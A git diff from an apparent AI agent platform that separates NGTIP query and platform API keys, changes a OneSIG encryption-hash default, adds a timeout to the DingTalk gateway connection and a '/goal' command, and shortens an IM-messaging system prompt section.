-    if not apikey:
-        raise ValueError(
-            "NGTIP API key not found. Configure ngtip_api.apiKey in your service settings "
-            "or set the NGTIP_APIKEY environment variable."
+    platform_apikey = (
+        _resolve_api_key(
+            raw,
+            "platformApiKey",
+            "platform_apikey",
+            secret_names=("ngtip_platform_apikey", f"{SERVICE_ID}_platform_apikey"),
+            env_name="NGTIP_PLATFORM_APIKEY",
         )
-    return platform_base_url, query_base_url, timeout, apikey, _resolve_verify_ssl(raw)
+        or legacy_apikey
+    )
+
+    return (
+        platform_base_url,
+        query_base_url,
+        timeout,
+        query_apikey,
+        platform_apikey,
+        _resolve_verify_ssl(raw),
+    )
 
 
 # ─── helpers ──────────────────────────────────────────────────────────────────
@@ -469,12 +517,27 @@ async def query(ctx: ToolContext, action: str, **params: Any) -> ToolResult:
         return ToolResult(success=False, error=err)
 
     try:
-        _, query_base_url, timeout, apikey, verify_ssl = _resolve_runtime_config()
+        (
+            _,
+            query_base_url,
+            timeout,
+            query_apikey,
+            _,
+            verify_ssl,
+        ) = _resolve_runtime_config()
     except ValueError as exc:
         return ToolResult(success=False, error=str(exc))
+    if not query_apikey:
+        return ToolResult(
+            success=False,
+            error=(
+                "NGTIP query API key not found. Configure queryApiKey in the NGTIP "
+                "device settings, or keep legacy apiKey/NGTIP_APIKEY as fallback."
+            ),
+        )
 
     url = f"{query_base_url}{spec.path}"
-    query_params = {"apikey": apikey, **spec.param_builder(params)}
+    query_params = {"apikey": query_apikey, **spec.param_builder(params)}
     result = await _get_request(url, query_params, timeout, verify_ssl, action)
     if result.success:
         result.metadata = {**(result.metadata or {}), "api": action}
@@ -495,19 +558,39 @@ async def platform(ctx: ToolContext, action: str, **params: Any) -> ToolResult:
         return ToolResult(success=False, error=err)
 
     try:
-        platform_base_url, _, timeout, apikey, verify_ssl = _resolve_runtime_config()
+        (
+            platform_base_url,
+            _,
+            timeout,
+            _,
+            platform_apikey,
+            verify_ssl,
+        ) = _resolve_runtime_config()
     except ValueError as exc:
         return ToolResult(success=False, error=str(exc))
+    if not platform_apikey and not spec.skip_apikey:
+        return ToolResult(
+            success=False,
+            error=(
+                "NGTIP platform API key not found. Configure platformApiKey in the "
+                "NGTIP "
+                "device settings, or keep legacy apiKey/NGTIP_APIKEY as fallback."
+            ),
+        )
 
     url = f"{platform_base_url}{spec.path}"
     payload = spec.payload_builder(params)
 
     if spec.method.upper() == "GET":
         if not spec.skip_apikey:
-            payload = {"apikey": apikey, **payload}
+            payload = {"apikey": platform_apikey, **payload}
         result = await _get_request(url, payload, timeout, verify_ssl, action)
     else:
-        body = {"apikey": apikey, **payload} if not spec.skip_apikey else payload
+        body = (
+            {"apikey": platform_apikey, **payload}
+            if not spec.skip_apikey
+            else payload
+        )
         result = await _post_request(url, body, timeout, verify_ssl, action)
 
     if result.success:
diff --git a/.flocks/plugins/tools/device/ngtip_v5_1_5/ngtip_platform.yaml b/.flocks/plugins/tools/device/ngtip_v5_1_5/ngtip_platform.yaml
index e089a8622..0815140b3 100644
--- a/.flocks/plugins/tools/device/ngtip_v5_1_5/ngtip_platform.yaml
+++ b/.flocks/plugins/tools/device/ngtip_v5_1_5/ngtip_platform.yaml
@@ -7,7 +7,7 @@ description: >
 description_cn: >
   NGTIP 平台功能分组工具。通过 `action` 参数调用情报管理、资产管理、用户管理、情报生产、
   设备联动、漏洞资产匹配、态势情报订阅和行业攻击情报接口。
-  Base URL 为平台功能端点（默认无端口）。请求体为 JSON，apikey 自动注入。
+  Base URL 为平台功能端点（默认无端口）。请求体为 JSON，平台功能 apikey 自动注入。
   【选用原则】
   - 写入类接口（新增情报/资产/用户）返回值仅含 response_code 和 verbose_msg，无 data；
   - 导出/查询类接口返回 data 含分页信息（current_page / total_page / total_record / items）；
diff --git a/.flocks/plugins/tools/device/ngtip_v5_1_5/ngtip_query.yaml b/.flocks/plugins/tools/device/ngtip_v5_1_5/ngtip_query.yaml
index 34f79682f..69b91cfa7 100644
--- a/.flocks/plugins/tools/device/ngtip_v5_1_5/ngtip_query.yaml
+++ b/.flocks/plugins/tools/device/ngtip_v5_1_5/ngtip_query.yaml
@@ -5,7 +5,7 @@ description: >
   intelligence, and IP geolocation APIs.
 description_cn: >
   NGTIP 情报查询分组工具。通过 `action` 参数调用失陷检测、IP 信誉、Hash 信誉、漏洞情报和 IP 地理位置接口。
-  Base URL 为情报查询端点（默认端口 8090）。所有接口支持 GET 传参（apikey 自动注入）。
+  Base URL 为情报查询端点（默认端口 8090）。所有接口支持 GET 传参（情报查询 apikey 自动注入）。
   【选用原则】
   - 出站场景（域名/失陷）优先使用 `query_dns`；
   - 入站场景（IP 行为分析）使用 `query_ip`；
diff --git a/.flocks/plugins/tools/device/onesig_v2_5_3_D20260321/_provider.yaml b/.flocks/plugins/tools/device/onesig_v2_5_3_D20260321/_provider.yaml
index c530dfb44..24236178d 100644
--- a/.flocks/plugins/tools/device/onesig_v2_5_3_D20260321/_provider.yaml
+++ b/.flocks/plugins/tools/device/onesig_v2_5_3_D20260321/_provider.yaml
@@ -32,7 +32,7 @@ credential_fields:
     config_key: api_prefix
     input_type: text
     required: false
-    default: "/api"
+    default: ""
     placeholder: "/api 或留空"
   - key: username
     label: Username
@@ -53,11 +53,11 @@ credential_fields:
     config_key: oaep_hash
     input_type: text
     required: false
-    default: "sha1"
+    default: "sha256"
     placeholder: "sha1 或 sha256"
 defaults:
-  api_prefix: "/api"
-  oaep_hash: "sha1"
+  api_prefix: ""
+  oaep_hash: "sha256"
   timeout: 60
   category: custom
   product_version: "2.5.3 D20260321"
@@ -69,7 +69,7 @@ notes: |
     - api_services.onesig_api.api_prefix   = ""               # 大部分 v2.5.x 部署留空；reverse-proxy 部署才填 "/api"
     - api_services.onesig_api.username     = "admin"
     - api_services.onesig_api.password     = "{secret:onesig_password}"
-    - api_services.onesig_api.oaep_hash    = "sha1"           # JSEncrypt 默认；联调失败可改为 sha256
+    - api_services.onesig_api.oaep_hash    = "sha256"
 
   `api_prefix` 选取建议：
     - 默认值 `""`（空）。绝大多数 OneSIG v2.5.x 设备 nginx 已经把 `/v3/`
@@ -122,11 +122,11 @@ notes: |
       也可以手动调用 `onesig_login` 的 `login` / `logout` 动作管理会话。
 
   RSA-OAEP 与 oaep_hash 联调指引：
-    - JSEncrypt（前端默认）使用 SHA-1 + MGF1-SHA1，因此本插件默认 `oaep_hash: sha1`。
+    - 本插件默认 `oaep_hash: sha256`。
     - 若 `POST /v3/login` 返回 responseCode `1009`（密码无效）或 `1017`（密码错误）但
-      用户名/口令确实正确，先优先怀疑 OAEP 哈希不匹配；将 oaep_hash 切换为 `sha256`
+      用户名/口令确实正确，先优先怀疑 OAEP 哈希不匹配；将 oaep_hash 切换为 `sha1`
       重试一次：
-        api_services.onesig_api.oaep_hash = "sha256"
+        api_services.onesig_api.oaep_hash = "sha1"
     - 改密、删除用户、清空审计、接口启停、设备升级等敏感写操作的 `password` 字段
       也使用同一份公钥与同一组哈希参数加密；切换 oaep_hash 时这些动作会同步生效。
     - 如果对接遇到「公钥过期」型报错，可直接重发；处理器在改密/敏感字段加密前会
diff --git a/.flocks/plugins/tools/device/onesig_v2_5_3_D20260321/onesig.handler.py b/.flocks/plugins/tools/device/onesig_v2_5_3_D20260321/onesig.handler.py
index 2fc541613..f43ba3a2c 100644
--- a/.flocks/plugins/tools/device/onesig_v2_5_3_D20260321/onesig.handler.py
+++ b/.flocks/plugins/tools/device/onesig_v2_5_3_D20260321/onesig.handler.py
@@ -25,7 +25,7 @@
 # ``/api/v3/...`` 全部 404。改成空字符串作为开盒即用值；个别需要前缀的
 # 部署仍可在 UI 上把 ``api_prefix`` 设成 ``"/api"`` 或其它值覆盖。
 DEFAULT_API_PREFIX = ""
-DEFAULT_OAEP_HASH = "sha1"
+DEFAULT_OAEP_HASH = "sha256"
 DEFAULT_TIMEOUT = 60
 DEFAULT_VERIFY_SSL = False
 DEFAULT_PERSIST_COOKIES = True
diff --git a/.flocks/plugins/tools/device/sangfor_sip_v92/sangfor_sip.handler.py b/.flocks/plugins/tools/device/sangfor_sip_v92/sangfor_sip.handler.py
index bc87545f0..5415e4f48 100644
--- a/.flocks/plugins/tools/device/sangfor_sip_v92/sangfor_sip.handler.py
+++ b/.flocks/plugins/tools/device/sangfor_sip_v92/sangfor_sip.handler.py
@@ -443,6 +443,25 @@ async def handle_plain_text(cfg: RuntimeConfig, session: aiohttp.ClientSession,
 
 # ── Tool entry points ─────────────────────────────────────────────────────────
 
+def _tool_result_fields() -> Optional[set[str]]:
+    fields = getattr(ToolResult, "model_fields", None) or getattr(ToolResult, "__fields__", None)
+    if isinstance(fields, dict):
+        return set(fields)
+    return None
+
+
+def _success_result(data: Any) -> ToolResult:
+    fields = _tool_result_fields()
+    if fields is None or "output" in fields:
+        try:
+            return ToolResult(success=True, output=data)
+        except TypeError:
+            if fields is not None and "data" not in fields:
+                raise
+            pass
+    return ToolResult(success=True, **{"data": data})
+
+
 async def _run(action: str, params: dict[str, Any]) -> ToolResult:
     handler_fn = _ACTION_MAP.get(action)
     if handler_fn is None:
@@ -458,7 +477,7 @@ async def _run(action: str, params: dict[str, Any]) -> ToolResult:
         timeout_obj = aiohttp.ClientTimeout(total=cfg.timeout)
         async with aiohttp.ClientSession(connector=connector, timeout=timeout_obj) as session:
             data = await handler_fn(cfg, session, params)
-        return ToolResult(success=True, data=data)
+        return _success_result(data)
     except Exception as exc:
         return ToolResult(success=False, error=str(exc))
 
diff --git a/flocks/acp/agent.py b/flocks/acp/agent.py
index 3b9796e51..ae2ed6f6f 100644
--- a/flocks/acp/agent.py
+++ b/flocks/acp/agent.py
@@ -1189,6 +1189,16 @@ async def set_session_mode(self, params: Dict[str, Any]) -> Dict[str, Any]:
         self._session_manager.set_mode(session_id, mode_id)
         
         return {"_meta": {}}
+
+    @staticmethod
+    def _parse_command_arguments(raw_args: str) -> Any:
+        stripped = (raw_args or "").strip()
+        if not stripped or stripped[0] not in "{[":
+            return None
+        try:
+            return json.loads(stripped)
+        except json.JSONDecodeError:
+            return None
     
     async def prompt(self, params: Dict[str, Any]) -> Dict[str, Any]:
         """
@@ -1313,6 +1323,7 @@ async def prompt(self, params: Dict[str, Any]) -> Dict[str, Any]:
             session_id=session_id,
             command=cmd["name"],
             arguments=cmd["args"],
+            arguments_json=self._parse_command_arguments(cmd["args"]),
             model=f"{model['providerID']}/{model['modelID']}",
             agent=agent,
             directory=directory,
diff --git a/flocks/agent/agents/rex/prompt_builder.py b/flocks/agent/agents/rex/prompt_builder.py
index ffdcabc74..4435432c0 100644
--- a/flocks/agent/agents/rex/prompt_builder.py
+++ b/flocks/agent/agents/rex/prompt_builder.py
@@ -59,7 +59,7 @@ def build_dynamic_rex_prompt(
     skills_section = _build_rex_skills_section(available_skills)
     workflows_section = build_workflows_section(available_workflows or [])
     security_priority = _build_security_priority_section(available_agents)
-    im_send_section = _build_im_send_section()
+    im_send_section = _build_im_send_pointer_section()
     anti_patterns = _build_rex_anti_patterns_section()
     command_guidance_section = _build_command_guidance_section()
     task_management_section = _task_management_section(use_task_system)
@@ -429,99 +429,8 @@ def _build_security_priority_section(available_agents: List["AvailableAgent"]) -
 Security sub-agents still have dedicated toolsets and should be preferred for non-trivial security analysis."""
 
 
-def _build_im_send_section() -> str:
-    return """### IM Send Protocol (MANDATORY when user asks to send a message to WeCom/Feishu/DingTalk)
+def _build_im_send_pointer_section() -> str:
+    return """### IM Messaging
 
-**Trigger**: Any request that involves sending a message to an IM platform (企业微信/WeCom、飞书/Feishu、钉钉/DingTalk).
-
-**Execute this exact sequence — no deviations:**
-
-#### Step 1 — Identify how the user is talking to you
-
-Check your system prompt for a `## Current IM Channel Context` block:
-
-| System prompt contains | Meaning | Action |
-|------------------------|---------|--------|
-| `## Current IM Channel Context` block present | User is chatting via an IM channel (Feishu/WeCom/DingTalk). The block contains the current Session ID and platform. | Use that Session ID as the **pre-selected default** → skip to Step 4, unless the user explicitly asked to send to a different session |
-| No such block | User is chatting via **Flocks Web UI** — this is NOT an IM session. You do NOT have a target session ID yet. | Proceed to Step 2 |
-
-#### Step 2 — Discover sessions (only if Step 1 found nothing)
-Call `session_manage(action="list", category="user", status="active")`.
-Filter results to sessions whose `title` starts with `[Wecom]`, `[Feishu]`, or `[Dingtalk]`.
-
-If no IM sessions found → stop and tell the user:
-> 未找到活跃的 IM session。请先在企业微信/飞书/钉钉中向 Flocks 机器人发送任意消息以建立 session。
-
-#### Step 3 — Ask user to pick a session (ALWAYS, unless session already resolved above)
-
-Use the `question` tool. Build options from the discovered sessions, and always append an "我不知道" option at the end:
-
-```
-question([{
-  "question": "您想要向 IM 中的哪个 session 发送消息？",
-  "type": "choice",
-  "options": [
-    // one entry per discovered IM session:
-    { "label": "<session title>", "description": "<session_id>" },
-    // always append this last:
-    { "label": "我不知道" }
-  ]
-}])
-```
-
-**After the user answers:**
-
-| User selected | Action |
-|---------------|--------|
-| A specific session | Use that option's `description` as `session_id`, proceed to Step 4 |
-| "我不知道" | Stop. Reply to the user: "如果您不确定是哪个 session，请先在群聊里 @机器人 发一条消息，例如：「你的 session id 是什么」，机器人会回复对应的 session id，然后再告诉我。" Do NOT proceed to send. |
-| User already gave an exact session ID | Skip Step 3 entirely, proceed to Step 4 |
-| User named a platform but no session ID | Show only sessions for that platform |
-
-#### Step 4 — Map title prefix to channel_type
-
-| Title prefix | channel_type |
-|--------------|--------------|
-| `[Wecom]`    | `wecom`      |
-| `[Feishu]`   | `feishu`     |
-| `[Dingtalk]` | `dingtalk`   |
-
-#### Step 5 — Send
-
-```
-channel_message(session_id="<id>", message="<content>", channel_type="<type>")
-```
-
-#### Step 6 — Report
-- Success: confirm which session/platform received it.
-- Failure: show the error; suggest checking bot connectivity.
-
----
-
-### IM Session Resolution for schedule_task_create (MANDATORY)
-
-**Trigger**: User asks to create a scheduled or queued task whose action includes sending a message to an IM platform.
-
-Before calling `schedule_task_create`, you MUST resolve the target IM session id and embed it into the task `description`. The task runs unattended — it cannot ask the user at execution time.
-
-**Protocol (run BEFORE schedule_task_create):**
-
-1. Follow **Steps 1–3 above** to resolve `session_id` and `channel_type`.
-   - If the user selects "我不知道" → stop. Do NOT create the task. Tell the user they must provide a session id first.
-2. Once resolved, embed both values into the `description` field:
-
-```
-schedule_task_create(
-  title="...",
-  description="... 发送到 IM channel_type=<wecom|feishu|dingtalk> session_id=<id>",
-  ...
-)
-```
-
-3. Also include them in `user_prompt` so the executing agent can parse them:
-
-```
-user_prompt="向 <platform> session <session_id> 发送消息：<message content>"
-```
-
-**Why this is required**: The task executor runs in a new session with no user present. Without the session_id baked in, it cannot ask — and will silently fail or send to the wrong target."""
+When the user wants to send a message to an IM platform, call `im_send_message`.
+When creating a scheduled task that sends to an IM platform later, resolve the target `session_id` with `im_send_message(resolve_only=true)` before calling `schedule_task_create`."""
diff --git a/flocks/agent/registry.py b/flocks/agent/registry.py
index 6f179c4a0..c2b001985 100644
--- a/flocks/agent/registry.py
+++ b/flocks/agent/registry.py
@@ -333,7 +333,8 @@ def _consume_agents(agents: list, source: str) -> None:
             consumer=_consume_agents,
             yaml_item_factory=_yaml_to_agent_info,
         ))
-        PluginLoader.load_all(
+        PluginLoader.load_extension(
+            "AGENTS",
             extra_sources=cfg.plugin or [],
             project_dir=Path.cwd(),
         )
diff --git a/flocks/channel/builtin/dingtalk/channel.py b/flocks/channel/builtin/dingtalk/channel.py
index 276112bc9..30d4874c0 100644
--- a/flocks/channel/builtin/dingtalk/channel.py
+++ b/flocks/channel/builtin/dingtalk/channel.py
@@ -73,6 +73,13 @@ def validate_config(self, config: dict) -> Optional[str]:
                 "Missing required config: appKey/appSecret (also accepted as "
                 "clientId/clientSecret), at top-level or under accounts.<name>"
             )
+        for account in accounts:
+            app_key = str(account.get("appKey") or account.get("clientId") or "")
+            if app_key.startswith("dingtalk_"):
+                return (
+                    "Invalid DingTalk Client ID: use the app AppKey, for example "
+                    "'dingxxxxxxxxxxxxxxxx', not a value prefixed with 'dingtalk_'."
+                )
         return None
 
     # ------------------------------------------------------------------
diff --git a/flocks/channel/builtin/dingtalk/stream.py b/flocks/channel/builtin/dingtalk/stream.py
index 75581860b..8792e3e30 100644
--- a/flocks/channel/builtin/dingtalk/stream.py
+++ b/flocks/channel/builtin/dingtalk/stream.py
@@ -34,6 +34,8 @@
 import platform
 import re
 import time
+from types import MethodType
+from urllib.parse import quote_plus
 import uuid
 from typing import Any, Awaitable, Callable, Optional
 
@@ -72,6 +74,7 @@
 # us distinguish "wrong key/secret" from "transient network blip".
 _GATEWAY_OPEN_URL = "https://api.dingtalk.com/v1.0/gateway/connections/open"
 _GATEWAY_PREFLIGHT_TIMEOUT = 10.0
+_SDK_OPEN_CONNECTION_TIMEOUT = 10.0
 
 # DingTalk error codes that mean "the credentials / app are not valid"
 # — retrying with the same secret will never succeed.  Codes are
@@ -232,6 +235,81 @@ async def _preflight_open_connection(
     )
 
 
+def _safe_get_host_ip(client: Any) -> str:
+    """Best-effort host IP for the SDK gateway payload."""
+    getter = getattr(client, "get_host_ip", None)
+    if getter is None:
+        return ""
+    try:
+        return str(getter() or "")
+    except Exception:
+        return ""
+
+
+def _install_bounded_open_connection(client: Any) -> None:
+    """Patch the SDK's blocking gateway open call with a finite timeout.
+
+    dingtalk-stream 0.24.x exposes an async ``start()``, but it calls a
+    synchronous ``requests.post`` without a timeout inside
+    ``open_connection``.  Keeping the patch on the client instance avoids
+    changing global SDK behavior while guaranteeing this runner cannot
+    park forever on a gateway TCP read.
+    """
+
+    def _open_connection_with_timeout(self: Any) -> Optional[dict]:
+        import requests
+
+        api = getattr(type(self), "OPEN_CONNECTION_API", _GATEWAY_OPEN_URL)
+        logger = getattr(self, "logger", None)
+        if logger is not None:
+            logger.info("open connection, url=%s", api)
+
+        request_headers = {
+            "Content-Type": "application/json",
+            "Accept": "application/json",
+            "User-Agent": (
+                f"FlocksDingTalkStream/1.0 Python/{platform.python_version()}"
+            ),
+        }
+        topics = []
+        if getattr(self, "_is_event_required", False):
+            topics.append({"type": "EVENT", "topic": "*"})
+        callback_map = getattr(self, "callback_handler_map", {}) or {}
+        for topic in callback_map.keys():
+            topics.append({"type": "CALLBACK", "topic": topic})
+
+        credential = getattr(self, "credential", None)
+        request_body = json.dumps({
+            "clientId": getattr(credential, "client_id", ""),
+            "clientSecret": getattr(credential, "client_secret", ""),
+            "subscriptions": topics,
+            "ua": "flocks-dingtalk-stream/1.0",
+            "localIp": _safe_get_host_ip(self),
+        }).encode("utf-8")
+
+        response_text = ""
+        try:
+            response = requests.post(
+                api,
+                headers=request_headers,
+                data=request_body,
+                timeout=_SDK_OPEN_CONNECTION_TIMEOUT,
+            )
+            response_text = response.text
+            response.raise_for_status()
+            return response.json()
+        except Exception as exc:
+            if logger is not None:
+                logger.error(
+                    "open connection failed, error=%s, response.text=%s",
+                    exc,
+                    response_text,
+                )
+            return None
+
+    client.open_connection = MethodType(_open_connection_with_timeout, client)
+
+
 # ---------------------------------------------------------------------------
 # Gating helpers (mirrors hermes-agent's DingTalkAdapter logic)
 # ---------------------------------------------------------------------------
@@ -579,6 +657,7 @@ def __init__(
         self._stream_client: Any = None
         self._stream_task: Optional[asyncio.Task] = None
         self._running = False
+        self._loop: Optional[asyncio.AbstractEventLoop] = None
 
         # ── R3: bounded inbound dispatch queue + worker pool ─────────
         # Both knobs are tunable per-account so noisy tenants can lift
@@ -636,6 +715,7 @@ async def run(self, abort_event: Optional[asyncio.Event] = None) -> None:
 
         credential = dingtalk_stream.Credential(self.client_id, self.client_secret)
         self._stream_client = dingtalk_stream.DingTalkStreamClient(credential)
+        _install_bounded_open_connection(self._stream_client)
 
         handler = _IncomingHandler(self)
         self._stream_client.register_callback_handler(
@@ -660,6 +740,7 @@ async def run(self, abort_event: Optional[asyncio.Event] = None) -> None:
         })
 
         self._running = True
+        self._loop = asyncio.get_running_loop()
         self._stream_task = asyncio.create_task(self._run_with_reconnect())
         try:
             if abort_event is None:
@@ -686,6 +767,52 @@ async def _wait_for_abort(self, abort_event: asyncio.Event) -> None:
             task.cancel()
         await asyncio.gather(*pending, return_exceptions=True)
 
+    async def _start_stream_client_session(self) -> None:
+        """Open one DingTalk websocket session under Flocks cancellation rules.
+
+        The official SDK's ``start()`` has its own forever loop and performs a
+        synchronous no-timeout gateway request on the caller's event loop.  We
+        keep using the SDK's credential, callback, keepalive, and message
+        background-task helpers, but drive one connection attempt ourselves so
+        a slow DingTalk gateway cannot block FastAPI and shutdown can cancel
+        promptly.
+        """
+        import websockets
+
+        client = self._stream_client
+        if client is None:
+            raise RuntimeError("DingTalk stream client is not initialised")
+
+        client.pre_start()
+        connection = await asyncio.to_thread(client.open_connection)
+        if not self._running:
+            return
+        if not connection:
+            raise RuntimeError("DingTalk SDK open_connection failed")
+
+        endpoint = connection.get("endpoint")
+        ticket = connection.get("ticket")
+        if not endpoint or not ticket:
+            raise RuntimeError("DingTalk SDK open_connection returned no endpoint")
+
+        uri = f"{endpoint}?ticket={quote_plus(str(ticket))}"
+        keepalive_task: Optional[asyncio.Task] = None
+        async with websockets.connect(uri) as websocket:
+            client.websocket = websocket
+            keepalive_task = asyncio.create_task(client.keepalive(websocket))
+            try:
+                async for raw_message in websocket:
+                    if not self._running:
+                        return
+                    json_message = json.loads(raw_message)
+                    asyncio.create_task(client.background_task(json_message))
+            finally:
+                if keepalive_task is not None:
+                    keepalive_task.cancel()
+                    await asyncio.gather(keepalive_task, return_exceptions=True)
+                if getattr(client, "websocket", None) is websocket:
+                    client.websocket = None
+
     async def _run_with_reconnect(self) -> None:
         backoff_idx = 0
         while self._running:
@@ -711,15 +838,15 @@ async def _run_with_reconnect(self) -> None:
                 return
             except Exception as exc:
                 # Transient pre-flight failure (network blip, 5xx, …) —
-                # log and fall through to the SDK, which will re-attempt
-                # ``open_connection`` with its own loop.
+                # log and still attempt one bounded SDK gateway open; the
+                # outer reconnect loop applies normal backoff afterwards.
                 log.warning("dingtalk.stream.preflight_transient_error", {
                     "account": self.account_id, "error": str(exc),
                 })
 
             # ── R1: stall accounting ─────────────────────────────────
-            # Snapshot inbound counters around the SDK's ``start()`` so
-            # we can later tell apart:
+            # Snapshot inbound counters around one stream session so we
+            # can later tell apart:
             #   (a) healthy long-lived connection (duration ≫ threshold)
             #   (b) connection torn down by an exception → backoff path
             #   (c) silent gateway rejection (clean return, < threshold,
@@ -734,7 +861,7 @@ async def _run_with_reconnect(self) -> None:
             # tried to open a websocket.
             try:
                 log.info("dingtalk.stream.starting", {"account": self.account_id})
-                await self._stream_client.start()
+                await self._start_stream_client_session()
                 clean_return = True
             except asyncio.CancelledError:
                 return
@@ -875,6 +1002,7 @@ async def _shutdown(self) -> None:
         self._dispatch_queue = None
 
         self._stream_client = None
+        self._loop = None
 
     # -- inbound dispatch ------------------------------------------------
 
@@ -955,6 +1083,28 @@ def _enqueue_dispatch(self, chatbot_msg: Any) -> None:
         path.  Burst load (group floods) sheds gracefully instead of
         spinning unbounded background tasks (R3).
         """
+        owner_loop = self._loop
+        if owner_loop is not None:
+            try:
+                running_loop = asyncio.get_running_loop()
+            except RuntimeError:
+                running_loop = None
+            if running_loop is not owner_loop:
+                try:
+                    owner_loop.call_soon_threadsafe(
+                        self._enqueue_dispatch_on_owner_loop,
+                        chatbot_msg,
+                    )
+                except RuntimeError:
+                    log.warning("dingtalk.stream.dispatch_loop_unavailable", {
+                        "account": self.account_id,
+                    })
+                return
+
+        self._enqueue_dispatch_on_owner_loop(chatbot_msg)
+
+    def _enqueue_dispatch_on_owner_loop(self, chatbot_msg: Any) -> None:
+        """Enqueue on the loop that owns the asyncio.Queue."""
         # ``_messages_received`` powers the stall-detection counter
         # (R1); count what the SDK actually delivered, even if we end
         # up shedding the message due to back-pressure.
diff --git a/flocks/channel/inbound/dispatcher.py b/flocks/channel/inbound/dispatcher.py
index 96987c237..37f38a242 100644
--- a/flocks/channel/inbound/dispatcher.py
+++ b/flocks/channel/inbound/dispatcher.py
@@ -1142,8 +1142,9 @@ async def _append_user_message(
         import mimetypes
         import os
         from pathlib import Path
-        from urllib.parse import unquote, urlparse
+        from urllib.parse import urlparse
 
+        from flocks.session.utils.file_extractor import file_url_to_path
         from flocks.session.message import FilePart, Message, MessageRole
 
         create_kwargs: dict = dict(
@@ -1197,8 +1198,8 @@ async def _append_user_message(
                 })
             elif scheme in ("", "file"):
                 # Local file already downloaded by the channel plugin (e.g. weixin).
-                # file:// URIs may have URL-encoded paths (e.g. Chinese filenames).
-                local_path = unquote(parsed.path) if scheme == "file" else msg.media_url
+                # file:// URIs may have URL-encoded or Windows drive paths.
+                local_path = file_url_to_path(msg.media_url) if scheme == "file" else msg.media_url
                 if not os.path.isfile(local_path):
                     log.warning("dispatcher.inbound_media_missing", {
                         "channel_id": msg.channel_id,
diff --git a/flocks/command/command.py b/flocks/command/command.py
index 7e9190753..c9322ba72 100644
--- a/flocks/command/command.py
+++ b/flocks/command/command.py
@@ -202,6 +202,17 @@ def _ensure_defaults(cls) -> None:
                 allow_attachments=False,
                 visible_surfaces=("webui", "tui", "acp", "cli"),
             ),
+            CommandDef(
+                name="goal",
+                description="Set a persistent session goal",
+                template="Set session goal: $ARGUMENTS",
+                agent="rex",
+                execution_kind="direct",
+                allow_attachments=False,
+                visible_surfaces=ALL_SURFACES,
+                requires_existing_session=True,
+                channel_safe=True,
+            ),
             CommandDef(
                 name="model",
                 description="Change or inspect the current model",
diff --git a/flocks/command/direct.py b/flocks/command/direct.py
index 47f9851a1..c3ca6c9e8 100644
--- a/flocks/command/direct.py
+++ b/flocks/command/direct.py
@@ -6,12 +6,13 @@
 
 from collections import defaultdict
 from dataclasses import dataclass
-from typing import Optional
+from typing import Any, Optional
 
 from flocks.agent.agent import AvailableAgent
 from flocks.agent.registry import Agent
 from flocks.command.command import Command, CommandInfo, CommandSurface
 from flocks.command.help import format_help
+from flocks.session.goal import GoalManager
 from flocks.skill.skill import Skill
 from flocks.tool.registry import ToolRegistry
 
@@ -132,7 +133,9 @@ async def run_direct_command(
     name: str,
     *,
     args: str = "",
+    args_json: Optional[Any] = None,
     surface: Optional[CommandSurface] = None,
+    session_id: Optional[str] = None,
 ) -> DirectCommandResult:
     """Execute a direct command and return its result."""
     resolved = Command.resolve(name)
@@ -141,6 +144,7 @@ async def run_direct_command(
 
     name = resolved.name
     args = (args or "").strip()
+    _ = args_json
 
     if name == "help":
         return DirectCommandResult(handled=True, text=format_help(surface=surface))
@@ -148,6 +152,27 @@ async def run_direct_command(
     if name == "clear":
         return DirectCommandResult(handled=True, clear_history=True)
 
+    if name == "goal":
+        if not session_id:
+            return DirectCommandResult(
+                handled=True,
+                success=False,
+                text="Usage: /goal requires an active session.",
+            )
+
+        try:
+            state = await GoalManager.set_goal(session_id, args)
+        except ValueError:
+            return DirectCommandResult(
+                handled=True,
+                success=False,
+                text="Usage: /goal <objective>",
+            )
+        return DirectCommandResult(
+            handled=True,
+            prompt=GoalManager.goal_prompt(state.objective),
+        )
+
     if name == "tools":
         if not args or args == "list":
             return DirectCommandResult(handled=True, text=build_tools_catalog_summary())
diff --git a/flocks/command/handler.py b/flocks/command/handler.py
index 808693bc2..6f5064bad 100644
--- a/flocks/command/handler.py
+++ b/flocks/command/handler.py
@@ -6,6 +6,7 @@
 
 from flocks.command.command import Command, CommandSurface
 from flocks.command.direct import run_direct_command
+from flocks.input.events import ParsedCommand
 
 
 SendText = Callable[[str], Awaitable[None]]
@@ -17,36 +18,53 @@
 async def handle_slash_command(
     content: str,
     *,
+    parsed_command: Optional[ParsedCommand] = None,
     send_text: SendText,
     send_prompt: SendPrompt,
     clear_screen: Optional[ClearScreen] = None,
     clear_history: Optional[ClearHistory] = None,
     surface: Optional[CommandSurface] = None,
+    session_id: Optional[str] = None,
 ) -> bool:
     """
     Handle supported slash commands.
 
     Returns True if handled.
     """
-    stripped = content.strip()
-    if not stripped.startswith("/"):
-        return False
+    parsed = parsed_command
+    if parsed is None:
+        stripped = content.strip()
+        if not stripped.startswith("/"):
+            return False
 
-    cmd_parts = stripped[1:].split(None, 1)
-    if not cmd_parts:
-        return False
+        cmd_parts = stripped[1:].split(None, 1)
+        if not cmd_parts:
+            return False
+        parsed = ParsedCommand(
+            raw_text=stripped,
+            command_name=cmd_parts[0].lower(),
+            canonical_name=cmd_parts[0].lower(),
+            args=cmd_parts[1].strip() if len(cmd_parts) > 1 else "",
+        )
 
-    resolved = Command.resolve(cmd_parts[0].lower())
+    resolved = Command.resolve(parsed.command_name)
     if not resolved or resolved.execution_kind != "direct":
         return False
 
     name = resolved.name
-    args = cmd_parts[1].strip() if len(cmd_parts) > 1 else ""
-    result = await run_direct_command(name, args=args, surface=surface)
+    result = await run_direct_command(
+        name,
+        args=parsed.args,
+        args_json=parsed.args_json,
+        surface=surface,
+        session_id=session_id,
+    )
     if not result.handled:
         return False
 
     if result.prompt is not None:
+        if result.text:
+            await send_text(result.text)
         await send_prompt(result.prompt)
         return True
 
diff --git a/flocks/hooks/pipeline.py b/flocks/hooks/pipeline.py
index 1a8c7eb84..817406c57 100644
--- a/flocks/hooks/pipeline.py
+++ b/flocks/hooks/pipeline.py
@@ -206,7 +206,8 @@ async def ensure_initialized(cls, project_dir: Optional[Path] = None) -> None:
             from flocks.plugin import PluginLoader
 
             cfg = await Config.get()
-            PluginLoader.load_all(
+            PluginLoader.load_extension(
+                "HOOKS",
                 extra_sources=cfg.plugin or [],
                 project_dir=load_project_dir,
             )
diff --git a/flocks/hub/installer.py b/flocks/hub/installer.py
index c28cb25f0..7f37d2b9a 100644
--- a/flocks/hub/installer.py
+++ b/flocks/hub/installer.py
@@ -131,10 +131,12 @@ async def _refresh_runtime(plugin_type: PluginType) -> None:
